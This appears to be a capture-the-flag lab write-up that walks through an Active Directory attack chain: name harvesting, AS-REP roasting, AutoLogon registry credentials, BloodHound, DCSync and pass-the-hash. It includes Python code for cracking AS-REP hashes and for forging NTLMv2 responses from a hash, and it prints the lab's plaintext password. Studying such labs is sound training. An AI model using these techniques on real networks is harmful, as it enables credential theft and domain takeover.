Beginner-friendly Active Directory machine teaching a classic real-world attack chain: harvest employee names
from a public website, generate AD username candidates, AS-REP Roast a user with pre-authentication disabled,
find plaintext credentials in the Windows AutoLogon registry key, then perform a DCSync attack via
GetChangesAll to dump all domain hashes and pass-the-hash as Administrator.
User Flag
5552b074550axxxxxxxxxxxxxxxxxxxx
Root Flag
01d83bce08bbxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance — Nmap
Full port scan against the target. The open ports immediately identify this as a Domain Controller.
nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.35.227
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
389/tcp  open  ldap          Active Directory (Domain: EGOTISTICAL-BANK.LOCAL)
445/tcp  open  microsoft-ds  SMB
5985/tcp open  http          WinRM
DC confirmed: ports 88 (Kerberos) + 389 (LDAP) + 53 (DNS) = Domain Controller. Domain: EGOTISTICAL-BANK.LOCAL. Port 5985 (WinRM) is open, so any domain account with remote management rights gives a shell without needing an exploit.
02 Web Enumeration — Harvesting Employee Names
Browsing http://10.129.35.227 reveals the Egotistical Bank website. The About page lists the full names of team members — valuable for generating AD username candidates.
why this matters: AD usernames are almost always derived from real names (fsmith, fergus.smith, f.smith, etc.). Harvesting names from a public-facing site is passive as far as AD is concerned: no authentication, nothing touches Kerberos or LDAP, and the only trace is ordinary requests in the web server log.
03 Username Generation — username-anarchy
username-anarchy takes real names and generates every common AD username format automatically — fsmith, fergus.smith, smithf, fergussmith, and dozens more per person.
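A minimal reimplementation of what username-anarchy does, added here as an example (it is not the tool's code and not from the original write-up): it turns harvested full names into the common AD username formats and merges them into one deduplicated list for the AS-REP roasting step. The format list is an assumption that covers the patterns named above plus the usual variants; of the sample names only Fergus Smith is implied by the page, the other two are constructed.

```python
import re

# Common AD naming patterns. This list is an assumption: it covers the formats named in
# the write-up (fsmith, fergus.smith, smithf, fergussmith) plus the usual variants.
FORMATS = (
    "{first}", "{last}",
    "{first}{last}", "{first}.{last}", "{first}_{last}", "{first}-{last}",
    "{f}{last}", "{f}.{last}", "{f}_{last}",
    "{first}{l}", "{first}.{l}",
    "{last}{first}", "{last}.{first}", "{last}{f}", "{last}.{f}",
    "{f}{l}",
)


def normalise(part: str) -> str:
    """Lower-case and drop anything that is not a letter or digit (O'Brien -> obrien)."""
    return re.sub(r"[^a-z0-9]", "", part.lower())


def candidates(full_name: str) -> list:
    """Username candidates for one person, in FORMATS order, without duplicates."""
    parts = [p for p in (normalise(p) for p in full_name.split()) if p]
    if not parts:
        return []
    if len(parts) == 1:                      # a single token: nothing to combine
        return [parts[0]]
    first, last = parts[0], parts[-1]        # middle names are dropped
    fields = {"first": first, "last": last, "f": first[0], "l": last[0]}
    out = []
    for fmt in FORMATS:
        cand = fmt.format(**fields)
        if cand not in out:
            out.append(cand)
    return out


def build_userlist(full_names) -> list:
    """Merge everyone's candidates into one deduplicated list (the file given to GetNPUsers)."""
    seen, out = set(), []
    for name in full_names:
        for cand in candidates(name):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


if __name__ == "__main__":
    # Constructed input: Fergus Smith is implied by the write-up, the other two are made up.
    harvested = ["Fergus Smith", "Anne Marie O'Brien", "Hugo Bear-Jones"]
    for user in build_userlist(harvested):
        print(user)
```

The output is what you feed to GetNPUsers as the candidate list; every name costs one unauthenticated AS-REQ, so a wide format list is cheap.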
When Kerberos pre-authentication is disabled on an account (the DONT_REQ_PREAUTH flag), anyone who knows the username can request a TGT for it without proving knowledge of the password. The DC answers with an AS-REP whose enc-part is encrypted under a key derived from the account's password (for RC4-HMAC that key is the NT hash), so the cracking happens entirely offline against a wordlist. There is no lockout risk because no password guess is ever sent to the DC, although each request is still logged there as a TGT request (Event ID 4768 with pre-authentication type 0), so it is not invisible.
impacket-GetNPUsers — test all username candidates
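What the roast actually yields and why it cracks offline, as an added example that is not from the write-up or from impacket: the RC4-HMAC (etype 23) encryption the DC applies to the AS-REP enc-part under the user's NT hash (RFC 4757), the $krb5asrep$23$ line that GetNPUsers -format hashcat prints, and the per-candidate check a cracker performs. MD4 is implemented inline because hashlib lacks it on many OpenSSL 3 builds. The account name is the page's; the password, confounder and ticket bytes are constructed for the demo.

```python
import hmac
import struct


# MD4 in pure Python (RFC 1320): hashlib.new("md4") is unavailable on many OpenSSL 3 builds.
def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (  # (function, X[] index order, shift schedule, additive constant)
        (F, range(16), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for f, order, shifts, const in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + f(b, c, d) + X[k] + const) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for etype 23 it is also the Kerberos key."""
    return md4(password.encode("utf-16le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


KEY_USAGE_AS_REP_ENC_PART = 8  # RFC 4120 key usage number for the AS-REP enc-part


def _k1(nt_key: bytes) -> bytes:
    # RFC 4757: K1 = HMAC-MD5(K, key usage as a 4-byte little-endian integer)
    return hmac.new(nt_key, struct.pack("<I", KEY_USAGE_AS_REP_ENC_PART), "md5").digest()


def asrep_encrypt(password: str, enc_part: bytes, confounder: bytes):
    """DC side: RC4-HMAC encryption of the AS-REP enc-part under the user's NT hash."""
    k1 = _k1(nt_hash(password))
    msg = confounder + enc_part
    checksum = hmac.new(k1, msg, "md5").digest()      # K2 == K1 for Kerberos
    k3 = hmac.new(k1, checksum, "md5").digest()
    return checksum, rc4(k3, msg)


def hashcat_line(user: str, realm: str, checksum: bytes, ciphertext: bytes) -> str:
    """The $krb5asrep$23$ format GetNPUsers -format hashcat prints (hashcat mode 18200)."""
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}:{ciphertext.hex()}"


def crack_asrep(line: str, wordlist):
    """Cracker side: per candidate, derive K3, decrypt, and test whether the HMAC matches."""
    header, checksum_hex, ct_hex = line.split(":")
    if not header.startswith("$krb5asrep$23$"):
        raise ValueError("not an etype-23 AS-REP hash")
    checksum, ciphertext = bytes.fromhex(checksum_hex), bytes.fromhex(ct_hex)
    for candidate in wordlist:
        k1 = _k1(nt_hash(candidate))
        k3 = hmac.new(k1, checksum, "md5").digest()
        plaintext = rc4(k3, ciphertext)
        if hmac.compare_digest(hmac.new(k1, plaintext, "md5").digest(), checksum):
            return candidate  # only the right NT hash makes the checksum verify
    return None


def demo():
    # Constructed sample: password, confounder and enc-part bytes are made up for the demo.
    enc_part = b"\x79\x81\xc0" + b"\x00" * 29          # stand-in for the DER EncASRepPart
    checksum, ct = asrep_encrypt("Autumn2024!", enc_part, confounder=b"\x11" * 8)
    line = hashcat_line("fsmith", "EGOTISTICAL-BANK.LOCAL", checksum, ct)
    return line, crack_asrep(line, ["Password1", "Welcome1", "Autumn2024!"])


if __name__ == "__main__":
    line, cracked = demo()
    print(line)
    print("cracked:", cracked)
```

Each candidate costs two HMAC-MD5s, an MD4 and an RC4 pass, which is why hashcat chews through etype-23 roasts so quickly; accounts that only hold AES keys (etype 17/18) give the much slower $krb5asrep$18$ format instead.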
With fsmith's cracked password, WinRM on port 5985 gives a shell, but fsmith is a regular user. Upload WinPEAS to enumerate privilege escalation paths; it checks hundreds of misconfigurations including stored credentials, vulnerable services, and registry keys.
AutoLogon: when automatic logon is configured, Windows stores the credentials in plaintext under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (DefaultUserName, DefaultDomainName and DefaultPassword, with AutoAdminLogon set to 1). WinPEAS always checks here; it is a classic finding in real engagements too.
The registry shows svc_loanmanager but the actual AD account is svc_loanmgr, a common discrepancy: DefaultUserName is whatever an admin typed into the logon dialog, not necessarily the sAMAccountName, so confirm the account name against the domain before reusing the password.
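The same check done by hand, as an added example (not WinPEAS code and not from the write-up): parse the output of `reg query` for the Winlogon key and report the stored logon triple. The sample output is constructed; the user name and password in it are the values the write-up reports, the domain value and the remaining lines are assumptions.

```python
import re

WINLOGON_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Constructed `reg query` output. User name and password are the values the write-up
# reports; the DefaultDomainName value and the other lines are assumptions.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon      REG_SZ    1
    DefaultDomainName   REG_SZ    EGOTISTICAL-BANK.LOCAL
    DefaultUserName     REG_SZ    svc_loanmanager
    DefaultPassword     REG_SZ    Moneymakestheworldgoround!
    Shell               REG_SZ    explorer.exe
    Userinit            REG_SZ    C:\Windows\system32\userinit.exe,
"""

# A value line is indented: <name> <REG_type> <data>; the key path itself is not indented.
_VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s*(.*)$")


def parse_reg_query(text: str) -> dict:
    """Map value name -> (type, data) for one key's `reg query` output."""
    values = {}
    for line in text.splitlines():
        m = _VALUE_LINE.match(line)
        if m:
            values[m.group(1)] = (m.group(2), m.group(3).strip())
    return values


def autologon_credentials(values: dict):
    """Return the stored logon triple if DefaultPassword is set, else None.

    AutoAdminLogon may be 0 while DefaultPassword is still present (stale but often
    still valid), so the password alone decides whether this is a finding; the flag
    is reported alongside it.
    """
    password = values.get("DefaultPassword", ("", ""))[1]
    if not password:
        return None
    return {
        "user": values.get("DefaultUserName", ("", ""))[1],
        "domain": values.get("DefaultDomainName", ("", ""))[1],
        "password": password,
        "autologon_enabled": values.get("AutoAdminLogon", ("", "0"))[1] == "1",
    }


if __name__ == "__main__":
    print(autologon_credentials(parse_reg_query(SAMPLE_REG_QUERY)))
```

The "user" field is what Winlogon types into the logon box, which is why the write-up had to map svc_loanmanager to svc_loanmgr before the password worked.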
Run BloodHound as svc_loanmgr to map AD attack paths.
BloodHound collection
$ bloodhound-python -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' -d EGOTISTICAL-BANK.LOCAL -ns 10.129.35.227 -c All --zip
BloodHound finding: svc_loanmgr has GetChangesAll (DS-Replication-Get-Changes-All) over the domain, the extended right DCs use to replicate with each other. Together with DS-Replication-Get-Changes (BloodHound's GetChanges edge; when both are present BloodHound draws them as a DCSync edge) this allows a full DCSync attack.
07 Privilege Escalation — DCSync
GetChangesAll lets us act as a Domain Controller and pull every user's password hash through the replication interface (DRSUAPI). We run impacket's secretsdump remotely from Kali with -just-dc, so nothing is uploaded to the machine and neither LSASS nor the NTDS.dit file is touched.
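Why the dumped NT hash is a credential in its own right, as an added example that is not from the write-up or from impacket: the NTLMv2 computation (MS-NLMP 3.3.2) that a pass-the-hash client performs from the hash alone, and the check the server does against the hash it has stored. Neither side ever needs the password. The user and domain are the page's; the hash value, challenges and NetBIOS names are constructed.

```python
import hmac
import os
import struct
import time


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)). The NT hash is the only secret."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"), "md5").digest()


def target_info(nb_domain: str, nb_server: str) -> bytes:
    """Minimal AV_PAIR list as the server sends it in the CHALLENGE message."""
    def av_pair(av_id: int, text: str) -> bytes:
        data = text.encode("utf-16le")
        return struct.pack("<HH", av_id, len(data)) + data
    # MsvAvNbDomainName (2), MsvAvNbComputerName (1), MsvAvEOL (0)
    return av_pair(2, nb_domain) + av_pair(1, nb_server) + struct.pack("<HH", 0, 0)


def filetime_now() -> int:
    """Windows FILETIME: 100-ns ticks since 1601-01-01."""
    return int((time.time() + 11644473600) * 10_000_000)


def ntlmv2_response(nt_hash, user, domain, server_challenge, client_challenge, timestamp, av_pairs):
    """Client side (pass-the-hash): build NtChallengeResponse from the NT hash alone."""
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    key = ntowf_v2(nt_hash, user, domain)
    nt_proof = hmac.new(key, server_challenge + temp, "md5").digest()   # NTProofStr
    return nt_proof + temp


def verify_ntlmv2(stored_nt_hash, user, domain, server_challenge, response) -> bool:
    """Server/DC side: recompute NTProofStr from the stored hash and compare."""
    nt_proof, temp = response[:16], response[16:]
    key = ntowf_v2(stored_nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + temp, "md5").digest()
    return hmac.compare_digest(nt_proof, expected)


def demo() -> bool:
    # Constructed values: this is not the machine's Administrator hash.
    dumped_hash = bytes.fromhex("0123456789abcdef0123456789abcdef")
    user, domain = "Administrator", "EGOTISTICAL-BANK.LOCAL"
    server_challenge = os.urandom(8)                 # from the CHALLENGE message
    response = ntlmv2_response(dumped_hash, user, domain, server_challenge,
                               os.urandom(8), filetime_now(),
                               target_info("EGOBANK", "DC01"))
    return verify_ntlmv2(dumped_hash, user, domain, server_challenge, response)


if __name__ == "__main__":
    print("authenticated with hash only:", demo())
```

This is exactly what psexec/wmiexec/evil-winrm do with -hashes: the NT hash goes straight into ntowf_v2, so cracking the Administrator hash is optional. MS-NLMP section 4.2.4 publishes reference values for checking an implementation of this computation.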
key takeaways:
· Employee names on public sites → valid AD usernames — always enumerate web before touching AD
· AS-REP Roasting needs no credentials and causes no lockouts — test all username candidates
· AutoLogon stores plaintext passwords in the registry — WinPEAS finds this automatically
· GetChangesAll = DCSync = full domain compromise — flag it as critical in any assessment
· NTLM hashes are usable credentials — cracking is optional when you can pass-the-hash